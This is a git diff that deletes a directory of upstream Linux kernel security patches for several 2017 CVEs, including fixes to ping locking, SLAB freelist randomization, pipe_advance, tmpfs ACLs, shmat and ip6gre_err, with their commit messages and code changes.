- 			mask |= POLLOUT | POLLWRNORM;	/* writable */
- 	}
- 	return mask;
-@@ -856,7 +845,12 @@ static struct n_hdlc *n_hdlc_alloc(void)
- 	spin_lock_init(&n_hdlc->tx_free_buf_list.spinlock);
- 	spin_lock_init(&n_hdlc->rx_buf_list.spinlock);
- 	spin_lock_init(&n_hdlc->tx_buf_list.spinlock);
--	
-+
-+	INIT_LIST_HEAD(&n_hdlc->rx_free_buf_list.list);
-+	INIT_LIST_HEAD(&n_hdlc->tx_free_buf_list.list);
-+	INIT_LIST_HEAD(&n_hdlc->rx_buf_list.list);
-+	INIT_LIST_HEAD(&n_hdlc->tx_buf_list.list);
-+
- 	/* allocate free rx buffer list */
- 	for(i=0;i<DEFAULT_RX_BUF_COUNT;i++) {
- 		buf = kmalloc(N_HDLC_BUF_SIZE, GFP_KERNEL);
-@@ -884,53 +878,65 @@ static struct n_hdlc *n_hdlc_alloc(void)
- }	/* end of n_hdlc_alloc() */
- 
- /**
-+ * n_hdlc_buf_return - put the HDLC buffer after the head of the specified list
-+ * @buf_list - pointer to the buffer list
-+ * @buf - pointer to the buffer
-+ */
-+static void n_hdlc_buf_return(struct n_hdlc_buf_list *buf_list,
-+						struct n_hdlc_buf *buf)
-+{
-+	unsigned long flags;
-+
-+	spin_lock_irqsave(&buf_list->spinlock, flags);
-+
-+	list_add(&buf->list_item, &buf_list->list);
-+	buf_list->count++;
-+
-+	spin_unlock_irqrestore(&buf_list->spinlock, flags);
-+}
-+
-+/**
-  * n_hdlc_buf_put - add specified HDLC buffer to tail of specified list
-- * @list - pointer to buffer list
-+ * @buf_list - pointer to buffer list
-  * @buf	- pointer to buffer
-  */
--static void n_hdlc_buf_put(struct n_hdlc_buf_list *list,
-+static void n_hdlc_buf_put(struct n_hdlc_buf_list *buf_list,
- 			   struct n_hdlc_buf *buf)
- {
- 	unsigned long flags;
--	spin_lock_irqsave(&list->spinlock,flags);
--	
--	buf->link=NULL;
--	if (list->tail)
--		list->tail->link = buf;
--	else
--		list->head = buf;
--	list->tail = buf;
--	(list->count)++;
--	
--	spin_unlock_irqrestore(&list->spinlock,flags);
--	
-+
-+	spin_lock_irqsave(&buf_list->spinlock, flags);
-+
-+	list_add_tail(&buf->list_item, &buf_list->list);
-+	buf_list->count++;
-+
-+	spin_unlock_irqrestore(&buf_list->spinlock, flags);
- }	/* end of n_hdlc_buf_put() */
- 
- /**
-  * n_hdlc_buf_get - remove and return an HDLC buffer from list
-- * @list - pointer to HDLC buffer list
-+ * @buf_list - pointer to HDLC buffer list
-  * 
-  * Remove and return an HDLC buffer from the head of the specified HDLC buffer
-  * list.
-  * Returns a pointer to HDLC buffer if available, otherwise %NULL.
-  */
--static struct n_hdlc_buf* n_hdlc_buf_get(struct n_hdlc_buf_list *list)
-+static struct n_hdlc_buf *n_hdlc_buf_get(struct n_hdlc_buf_list *buf_list)
- {
- 	unsigned long flags;
- 	struct n_hdlc_buf *buf;
--	spin_lock_irqsave(&list->spinlock,flags);
--	
--	buf = list->head;
-+
-+	spin_lock_irqsave(&buf_list->spinlock, flags);
-+
-+	buf = list_first_entry_or_null(&buf_list->list,
-+						struct n_hdlc_buf, list_item);
- 	if (buf) {
--		list->head = buf->link;
--		(list->count)--;
-+		list_del(&buf->list_item);
-+		buf_list->count--;
- 	}
--	if (!list->head)
--		list->tail = NULL;
--	
--	spin_unlock_irqrestore(&list->spinlock,flags);
-+
-+	spin_unlock_irqrestore(&buf_list->spinlock, flags);
- 	return buf;
--	
- }	/* end of n_hdlc_buf_get() */
- 
- static char hdlc_banner[] __initdata =
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch
deleted file mode 100644
index ec1a087b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-2671/^4.10/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 43a6684519ab0a6c52024b5e25322476cabad893 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 24 Mar 2017 19:36:13 -0700
-Subject: ping: implement proper locking
-
-We got a report of yet another bug in ping
-
-http://www.openwall.com/lists/oss-security/2017/03/24/6
-
-->disconnect() is not called with socket lock held.
-
-Fix this by acquiring ping rwlock earlier.
-
-Thanks to Daniel, Alexander and Andrey for letting us know this problem.
-
-Fixes: c319b4d76b9e ("net: ipv4: add IPPROTO_ICMP socket kind")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Daniel Jiang <danieljiang0415@gmail.com>
-Reported-by: Solar Designer <solar@openwall.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ping.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-(limited to 'net/ipv4/ping.c')
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index 2af6244..ccfbce1 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -156,17 +156,18 @@ int ping_hash(struct sock *sk)
- void ping_unhash(struct sock *sk)
- {
- 	struct inet_sock *isk = inet_sk(sk);
-+
- 	pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
-+	write_lock_bh(&ping_table.lock);
- 	if (sk_hashed(sk)) {
--		write_lock_bh(&ping_table.lock);
- 		hlist_nulls_del(&sk->sk_nulls_node);
- 		sk_nulls_node_init(&sk->sk_nulls_node);
- 		sock_put(sk);
- 		isk->inet_num = 0;
- 		isk->inet_sport = 0;
- 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
--		write_unlock_bh(&ping_table.lock);
- 	}
-+	write_unlock_bh(&ping_table.lock);
- }
- EXPORT_SYMBOL_GPL(ping_unhash);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch
deleted file mode 100644
index 284c3e9b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5546/4.7-^4.9/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From c4e490cf148e85ead0d1b1c2caaba833f1d5b29f Mon Sep 17 00:00:00 2001
-From: John Sperbeck <jsperbeck@google.com>
-Date: Tue, 10 Jan 2017 16:58:24 -0800
-Subject: mm/slab.c: fix SLAB freelist randomization duplicate entries
-
-This patch fixes a bug in the freelist randomization code.  When a high
-random number is used, the freelist will contain duplicate entries.  It
-will result in different allocations sharing the same chunk.
-
-It will result in odd behaviours and crashes.  It should be uncommon but
-it depends on the machines.  We saw it happening more often on some
-machines (every few hours of running tests).
-
-Fixes: c7ce4f60ac19 ("mm: SLAB freelist randomization")
-Link: http://lkml.kernel.org/r/20170103181908.143178-1-thgarnie@google.com
-Signed-off-by: John Sperbeck <jsperbeck@google.com>
-Signed-off-by: Thomas Garnier <thgarnie@google.com>
-Cc: Christoph Lameter <cl@linux.com>
-Cc: Pekka Enberg <penberg@kernel.org>
-Cc: David Rientjes <rientjes@google.com>
-Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- mm/slab.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/mm/slab.c b/mm/slab.c
-index 29bc6c0..4f2ec6b 100644
---- a/mm/slab.c
-+++ b/mm/slab.c
-@@ -2457,7 +2457,6 @@ union freelist_init_state {
- 		unsigned int pos;
- 		unsigned int *list;
- 		unsigned int count;
--		unsigned int rand;
- 	};
- 	struct rnd_state rnd_state;
- };
-@@ -2483,8 +2482,7 @@ static bool freelist_state_initialize(union freelist_init_state *state,
- 	} else {
- 		state->list = cachep->random_seq;
- 		state->count = count;
--		state->pos = 0;
--		state->rand = rand;
-+		state->pos = rand % count;
- 		ret = true;
- 	}
- 	return ret;
-@@ -2493,7 +2491,9 @@ static bool freelist_state_initialize(union freelist_init_state *state,
- /* Get the next entry on the list and randomize it using a random shift */
- static freelist_idx_t next_random_slot(union freelist_init_state *state)
- {
--	return (state->list[state->pos++] + state->rand) % state->count;
-+	if (state->pos >= state->count)
-+		state->pos = 0;
-+	return state->list[state->pos++];
- }
- 
- /* Swap two freelist entries */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch
deleted file mode 100644
index f4ad8521..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5547/4.9/0001.patch
+++ /dev/null
@@ -1,144 +0,0 @@
-From 6d104af38b570d37aa32a5803b04c354f8ed513d Mon Sep 17 00:00:00 2001
-From: Johan Hovold <johan@kernel.org>
-Date: Thu, 12 Jan 2017 18:17:42 +0100
-Subject: HID: corsair: fix DMA buffers on stack
-
-Not all platforms support DMA to the stack, and specifically since v4.9
-this is no longer supported on x86 with VMAP_STACK either.
-
-Note that the macro-mode buffer was larger than necessary.
-
-Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver")
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Johan Hovold <johan@kernel.org>
-Signed-off-by: Jiri Kosina <jkosina@suse.cz>
----
- drivers/hid/hid-corsair.c | 54 ++++++++++++++++++++++++++++++++++++-----------
- 1 file changed, 42 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/hid/hid-corsair.c b/drivers/hid/hid-corsair.c
-index 717704e..5971907 100644
---- a/drivers/hid/hid-corsair.c
-+++ b/drivers/hid/hid-corsair.c
-@@ -148,7 +148,11 @@ static enum led_brightness k90_backlight_get(struct led_classdev *led_cdev)
- 	struct usb_interface *usbif = to_usb_interface(dev->parent);
- 	struct usb_device *usbdev = interface_to_usbdev(usbif);
- 	int brightness;
--	char data[8];
-+	char *data;
-+
-+	data = kmalloc(8, GFP_KERNEL);
-+	if (!data)
-+		return -ENOMEM;
- 
- 	ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- 			      K90_REQUEST_STATUS,
-@@ -158,16 +162,22 @@ static enum led_brightness k90_backlight_get(struct led_classdev *led_cdev)
- 	if (ret < 0) {
- 		dev_warn(dev, "Failed to get K90 initial state (error %d).\n",
- 			 ret);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
- 	brightness = data[4];
- 	if (brightness < 0 || brightness > 3) {
- 		dev_warn(dev,
- 			 "Read invalid backlight brightness: %02hhx.\n",
- 			 data[4]);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
--	return brightness;
-+	ret = brightness;
-+out:
-+	kfree(data);
-+
-+	return ret;
- }
- 
- static enum led_brightness k90_record_led_get(struct led_classdev *led_cdev)
-@@ -253,7 +263,11 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- 	struct usb_interface *usbif = to_usb_interface(dev->parent);
- 	struct usb_device *usbdev = interface_to_usbdev(usbif);
- 	const char *macro_mode;
--	char data[8];
-+	char *data;
-+
-+	data = kmalloc(2, GFP_KERNEL);
-+	if (!data)
-+		return -ENOMEM;
- 
- 	ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- 			      K90_REQUEST_GET_MODE,
-@@ -263,7 +277,8 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- 	if (ret < 0) {
- 		dev_warn(dev, "Failed to get K90 initial mode (error %d).\n",
- 			 ret);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
- 
- 	switch (data[0]) {
-@@ -277,10 +292,15 @@ static ssize_t k90_show_macro_mode(struct device *dev,
- 	default:
- 		dev_warn(dev, "K90 in unknown mode: %02hhx.\n",
- 			 data[0]);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
- 
--	return snprintf(buf, PAGE_SIZE, "%s\n", macro_mode);
-+	ret = snprintf(buf, PAGE_SIZE, "%s\n", macro_mode);
-+out:
-+	kfree(data);
-+
-+	return ret;
- }
- 
- static ssize_t k90_store_macro_mode(struct device *dev,
-@@ -320,7 +340,11 @@ static ssize_t k90_show_current_profile(struct device *dev,
- 	struct usb_interface *usbif = to_usb_interface(dev->parent);
- 	struct usb_device *usbdev = interface_to_usbdev(usbif);
- 	int current_profile;
--	char data[8];
-+	char *data;
-+
-+	data = kmalloc(8, GFP_KERNEL);
-+	if (!data)
-+		return -ENOMEM;
- 
- 	ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0),
- 			      K90_REQUEST_STATUS,
-@@ -330,16 +354,22 @@ static ssize_t k90_show_current_profile(struct device *dev,
- 	if (ret < 0) {
- 		dev_warn(dev, "Failed to get K90 initial state (error %d).\n",
- 			 ret);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
- 	current_profile = data[7];
- 	if (current_profile < 1 || current_profile > 3) {
- 		dev_warn(dev, "Read invalid current profile: %02hhx.\n",
- 			 data[7]);
--		return -EIO;
-+		ret = -EIO;
-+		goto out;
- 	}
- 
--	return snprintf(buf, PAGE_SIZE, "%d\n", current_profile);
-+	ret = snprintf(buf, PAGE_SIZE, "%d\n", current_profile);
-+out:
-+	kfree(data);
-+
-+	return ret;
- }
- 
- static ssize_t k90_store_current_profile(struct device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch
deleted file mode 100644
index 9ed0c9ba..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5550/4.9/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Sat, 14 Jan 2017 19:33:08 -0500
-Subject: fix a fencepost error in pipe_advance()
-
-The logics in pipe_advance() used to release all buffers past the new
-position failed in cases when the number of buffers to release was equal
-to pipe->buffers.  If that happened, none of them had been released,
-leaving pipe full.  Worse, it was trivial to trigger and we end up with
-pipe full of uninitialized pages.  IOW, it's an infoleak.
-
-Cc: stable@vger.kernel.org # v4.9
-Reported-by: "Alan J. Wylie" <alan@wylie.me.uk>
-Tested-by: "Alan J. Wylie" <alan@wylie.me.uk>
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- lib/iov_iter.c | 54 +++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 31 insertions(+), 23 deletions(-)
-
-diff --git a/lib/iov_iter.c b/lib/iov_iter.c
-index 25f5723..e68604a 100644
---- a/lib/iov_iter.c
-+++ b/lib/iov_iter.c
-@@ -730,43 +730,50 @@ size_t iov_iter_copy_from_user_atomic(struct page *page,
- }
- EXPORT_SYMBOL(iov_iter_copy_from_user_atomic);
- 
-+static inline void pipe_truncate(struct iov_iter *i)
-+{
-+	struct pipe_inode_info *pipe = i->pipe;
-+	if (pipe->nrbufs) {
-+		size_t off = i->iov_offset;
-+		int idx = i->idx;
-+		int nrbufs = (idx - pipe->curbuf) & (pipe->buffers - 1);
-+		if (off) {
-+			pipe->bufs[idx].len = off - pipe->bufs[idx].offset;
-+			idx = next_idx(idx, pipe);
-+			nrbufs++;
-+		}
-+		while (pipe->nrbufs > nrbufs) {
-+			pipe_buf_release(pipe, &pipe->bufs[idx]);
-+			idx = next_idx(idx, pipe);
-+			pipe->nrbufs--;
-+		}
-+	}
-+}
-+
- static void pipe_advance(struct iov_iter *i, size_t size)
- {
- 	struct pipe_inode_info *pipe = i->pipe;
--	struct pipe_buffer *buf;
--	int idx = i->idx;
--	size_t off = i->iov_offset, orig_sz;
--	
- 	if (unlikely(i->count < size))
- 		size = i->count;
--	orig_sz = size;
--
- 	if (size) {
-+		struct pipe_buffer *buf;
-+		size_t off = i->iov_offset, left = size;
-+		int idx = i->idx;
- 		if (off) /* make it relative to the beginning of buffer */
--			size += off - pipe->bufs[idx].offset;
-+			left += off - pipe->bufs[idx].offset;
- 		while (1) {
- 			buf = &pipe->bufs[idx];
--			if (size <= buf->len)
-+			if (left <= buf->len)
- 				break;
--			size -= buf->len;
-+			left -= buf->len;
- 			idx = next_idx(idx, pipe);
- 		}
--		buf->len = size;
- 		i->idx = idx;
--		off = i->iov_offset = buf->offset + size;
--	}
--	if (off)
--		idx = next_idx(idx, pipe);
--	if (pipe->nrbufs) {
--		int unused = (pipe->curbuf + pipe->nrbufs) & (pipe->buffers - 1);
--		/* [curbuf,unused) is in use.  Free [idx,unused) */
--		while (idx != unused) {
--			pipe_buf_release(pipe, &pipe->bufs[idx]);
--			idx = next_idx(idx, pipe);
--			pipe->nrbufs--;
--		}
-+		i->iov_offset = buf->offset + left;
- 	}
--	i->count -= orig_sz;
-+	i->count -= size;
-+	/* ... and discard everything past that point */
-+	pipe_truncate(i);
- }
- 
- void iov_iter_advance(struct iov_iter *i, size_t size)
-@@ -826,6 +833,7 @@ void iov_iter_pipe(struct iov_iter *i, int direction,
- 			size_t count)
- {
- 	BUG_ON(direction != ITER_PIPE);
-+	WARN_ON(pipe->nrbufs == pipe->buffers);
- 	i->type = direction;
- 	i->pipe = pipe;
- 	i->idx = (pipe->curbuf + pipe->nrbufs) & (pipe->buffers - 1);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch
deleted file mode 100644
index 9da68329..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5551/3.14-^4.9/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 497de07d89c1410d76a15bec2bb41f24a2a89f31 Mon Sep 17 00:00:00 2001
-From: Gu Zheng <guzheng1@huawei.com>
-Date: Mon, 9 Jan 2017 09:34:48 +0800
-Subject: tmpfs: clear S_ISGID when setting posix ACLs
-
-This change was missed the tmpfs modification in In CVE-2016-7097
-commit 073931017b49 ("posix_acl: Clear SGID bit when setting
-file permissions")
-It can test by xfstest generic/375, which failed to clear
-setgid bit in the following test case on tmpfs:
-
-  touch $testfile
-  chown 100:100 $testfile
-  chmod 2755 $testfile
-  _runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
-
-Signed-off-by: Gu Zheng <guzheng1@huawei.com>
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- fs/posix_acl.c | 9 ++++-----
- 1 file changed, 4 insertions(+), 5 deletions(-)
-
-diff --git a/fs/posix_acl.c b/fs/posix_acl.c
-index 5955220..c9d48dc 100644
---- a/fs/posix_acl.c
-+++ b/fs/posix_acl.c
-@@ -922,11 +922,10 @@ int simple_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 	int error;
- 
- 	if (type == ACL_TYPE_ACCESS) {
--		error = posix_acl_equiv_mode(acl, &inode->i_mode);
--		if (error < 0)
--			return 0;
--		if (error == 0)
--			acl = NULL;
-+		error = posix_acl_update_mode(inode,
-+				&inode->i_mode, &acl);
-+		if (error)
-+			return error;
- 	}
- 
- 	inode->i_ctime = current_time(inode);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch
deleted file mode 100644
index 151b9470..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5669/^4.9/0001.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 95e91b831f87ac8e1f8ed50c14d709089b4e01b8 Mon Sep 17 00:00:00 2001
-From: Davidlohr Bueso <dave@stgolabs.net>
-Date: Mon, 27 Feb 2017 14:28:24 -0800
-Subject: ipc/shm: Fix shmat mmap nil-page protection
-
-The issue is described here, with a nice testcase:
-
-    https://bugzilla.kernel.org/show_bug.cgi?id=192931
-
-The problem is that shmat() calls do_mmap_pgoff() with MAP_FIXED, and
-the address rounded down to 0.  For the regular mmap case, the
-protection mentioned above is that the kernel gets to generate the
-address -- arch_get_unmapped_area() will always check for MAP_FIXED and
-return that address.  So by the time we do security_mmap_addr(0) things
-get funky for shmat().
-
-The testcase itself shows that while a regular user crashes, root will
-not have a problem attaching a nil-page.  There are two possible fixes
-to this.  The first, and which this patch does, is to simply allow root
-to crash as well -- this is also regular mmap behavior, ie when hacking
-up the testcase and adding mmap(...  |MAP_FIXED).  While this approach
-is the safer option, the second alternative is to ignore SHM_RND if the
-rounded address is 0, thus only having MAP_SHARED flags.  This makes the
-behavior of shmat() identical to the mmap() case.  The downside of this
-is obviously user visible, but does make sense in that it maintains
-semantics after the round-down wrt 0 address and mmap.
-
-Passes shm related ltp tests.
-
-Link: http://lkml.kernel.org/r/1486050195-18629-1-git-send-email-dave@stgolabs.net
-Signed-off-by: Davidlohr Bueso <dbueso@suse.de>
-Reported-by: Gareth Evans <gareth.evans@contextis.co.uk>
-Cc: Manfred Spraul <manfred@colorfullife.com>
-Cc: Michael Kerrisk <mtk.manpages@googlemail.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- ipc/shm.c | 13 +++++++++----
- 1 file changed, 9 insertions(+), 4 deletions(-)
-
-diff --git a/ipc/shm.c b/ipc/shm.c
-index d7805ac..06ea9ef 100644
---- a/ipc/shm.c
-+++ b/ipc/shm.c
-@@ -1091,8 +1091,8 @@ out_unlock1:
-  * "raddr" thing points to kernel space, and there has to be a wrapper around
-  * this.
-  */
--long do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr,
--	      unsigned long shmlba)
-+long do_shmat(int shmid, char __user *shmaddr, int shmflg,
-+	      ulong *raddr, unsigned long shmlba)
- {
- 	struct shmid_kernel *shp;
- 	unsigned long addr;
-@@ -1113,8 +1113,13 @@ long do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr,
- 		goto out;
- 	else if ((addr = (ulong)shmaddr)) {
- 		if (addr & (shmlba - 1)) {
--			if (shmflg & SHM_RND)
--				addr &= ~(shmlba - 1);	   /* round down */
-+			/*
-+			 * Round down to the nearest multiple of shmlba.
-+			 * For sane do_mmap_pgoff() parameters, avoid
-+			 * round downs that trigger nil-page and MAP_FIXED.
-+			 */
-+			if ((shmflg & SHM_RND) && addr >= shmlba)
-+				addr &= ~(shmlba - 1);
- 			else
- #ifndef __ARCH_FORCE_SHMLBA
- 				if (addr & ~PAGE_MASK)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch
deleted file mode 100644
index c4d5a3ce..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5897/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 7892032cfe67f4bde6fc2ee967e45a8fbaf33756 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sat, 4 Feb 2017 23:18:55 -0800
-Subject: ip6_gre: fix ip6gre_err() invalid reads
-
-Andrey Konovalov reported out of bound accesses in ip6gre_err()
-
-If GRE flags contains GRE_KEY, the following expression
-*(((__be32 *)p) + (grehlen / 4) - 1)
-
-accesses data ~40 bytes after the expected point, since
-grehlen includes the size of IPv6 headers.
-
-Let's use a "struct gre_base_hdr *greh" pointer to make this
-code more readable.
-
-p[1] becomes greh->protocol.
-grhlen is the GRE header length.
-
-Fixes: c12b395a4664 ("gre: Support GRE over IPv6")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv6/ip6_gre.c | 40 +++++++++++++++++++++-------------------
- 1 file changed, 21 insertions(+), 19 deletions(-)
-
-diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
-index 5586318..630b73b 100644
---- a/net/ipv6/ip6_gre.c
-+++ b/net/ipv6/ip6_gre.c
-@@ -367,35 +367,37 @@ static void ip6gre_tunnel_uninit(struct net_device *dev)
- 
- 
- static void ip6gre_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
--		u8 type, u8 code, int offset, __be32 info)
-+		       u8 type, u8 code, int offset, __be32 info)
- {
--	const struct ipv6hdr *ipv6h = (const struct ipv6hdr *)skb->data;
--	__be16 *p = (__be16 *)(skb->data + offset);
--	int grehlen = offset + 4;
-+	const struct gre_base_hdr *greh;
-+	const struct ipv6hdr *ipv6h;
-+	int grehlen = sizeof(*greh);
- 	struct ip6_tnl *t;
-+	int key_off = 0;
- 	__be16 flags;
-+	__be32 key;
- 
--	flags = p[0];
--	if (flags&(GRE_CSUM|GRE_KEY|GRE_SEQ|GRE_ROUTING|GRE_VERSION)) {
--		if (flags&(GRE_VERSION|GRE_ROUTING))
--			return;
--		if (flags&GRE_KEY) {
--			grehlen += 4;
--			if (flags&GRE_CSUM)
--				grehlen += 4;
--		}
-+	if (!pskb_may_pull(skb, offset + grehlen))
-+		return;
-+	greh = (const struct gre_base_hdr *)(skb->data + offset);
-+	flags = greh->flags;
-+	if (flags & (GRE_VERSION | GRE_ROUTING))
-+		return;
-+	if (flags & GRE_CSUM)
-+		grehlen += 4;
-+	if (flags & GRE_KEY) {
-+		key_off = grehlen + offset;
-+		grehlen += 4;
- 	}
- 
--	/* If only 8 bytes returned, keyed message will be dropped here */
--	if (!pskb_may_pull(skb, grehlen))
-+	if (!pskb_may_pull(skb, offset + grehlen))
- 		return;
- 	ipv6h = (const struct ipv6hdr *)skb->data;
--	p = (__be16 *)(skb->data + offset);
-+	greh = (const struct gre_base_hdr *)(skb->data + offset);
-+	key = key_off ? *(__be32 *)(skb->data + key_off) : 0;
- 
- 	t = ip6gre_tunnel_lookup(skb->dev, &ipv6h->daddr, &ipv6h->saddr,
--				flags & GRE_KEY ?
--				*(((__be32 *)p) + (grehlen / 4) - 1) : 0,
--				p[1]);
-+				 key, greh->protocol);
- 	if (!t)
- 		return;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch
deleted file mode 100644
index 596f8405..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch
+++ /dev/null
@@ -1,908 +0,0 @@
-From 0407c7a2f4734cd55902753d788fdbdc32ed7fd9 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Wed, 08 Feb 2017 11:26:59 -0800
-Subject: [PATCH] time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
-        SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Change-Id: Ice26d74094d3ad563808342c1604ad444234844b
-Suggested-by: Thomas Gleixner <tglx@linutronix.de>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: John Stultz <john.stultz@linaro.org>
-Cc: Nicolas Pitre <nicolas.pitre@linaro.org>
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan <jiangshanlai@gmail.com>
-Cc: Shuah Khan <shuah@kernel.org>
-Cc: Xing Gao <xgao01@email.wm.edu>
-Cc: Jonathan Corbet <corbet@lwn.net>
-Cc: Jessica Frazelle <me@jessfraz.com>
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
-Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
-Cc: Petr Mladek <pmladek@suse.com>
-Cc: Richard Cochran <richardcochran@gmail.com>
-Cc: Tejun Heo <tj@kernel.org>
-Cc: Michal Marek <mmarek@suse.com>
-Cc: Josh Poimboeuf <jpoimboe@redhat.com>
-Cc: Dmitry Vyukov <dvyukov@google.com>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: "Eric W. Biederman" <ebiederm@xmission.com>
-Cc: Olof Johansson <olof@lixom.net>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: linux-api@vger.kernel.org
-Cc: Arjan van de Ven <arjan@linux.intel.com>
-Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
-
-diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt
-deleted file mode 100644
-index 8abd40b..0000000
---- a/Documentation/timers/timer_stats.txt
-+++ /dev/null
-@@ -1,73 +0,0 @@
--timer_stats - timer usage statistics
--------------------------------------
--
--timer_stats is a debugging facility to make the timer (ab)usage in a Linux
--system visible to kernel and userspace developers. If enabled in the config
--but not used it has almost zero runtime overhead, and a relatively small
--data structure overhead. Even if collection is enabled runtime all the
--locking is per-CPU and lookup is hashed.
--
--timer_stats should be used by kernel and userspace developers to verify that
--their code does not make unduly use of timers. This helps to avoid unnecessary
--wakeups, which should be avoided to optimize power consumption.
--
--It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration
--section.
--
--timer_stats collects information about the timer events which are fired in a
--Linux system over a sample period:
--
--- the pid of the task(process) which initialized the timer
--- the name of the process which initialized the timer
--- the function where the timer was initialized
--- the callback function which is associated to the timer
--- the number of events (callbacks)
--
--timer_stats adds an entry to /proc: /proc/timer_stats
--
--This entry is used to control the statistics functionality and to read out the
--sampled information.
--
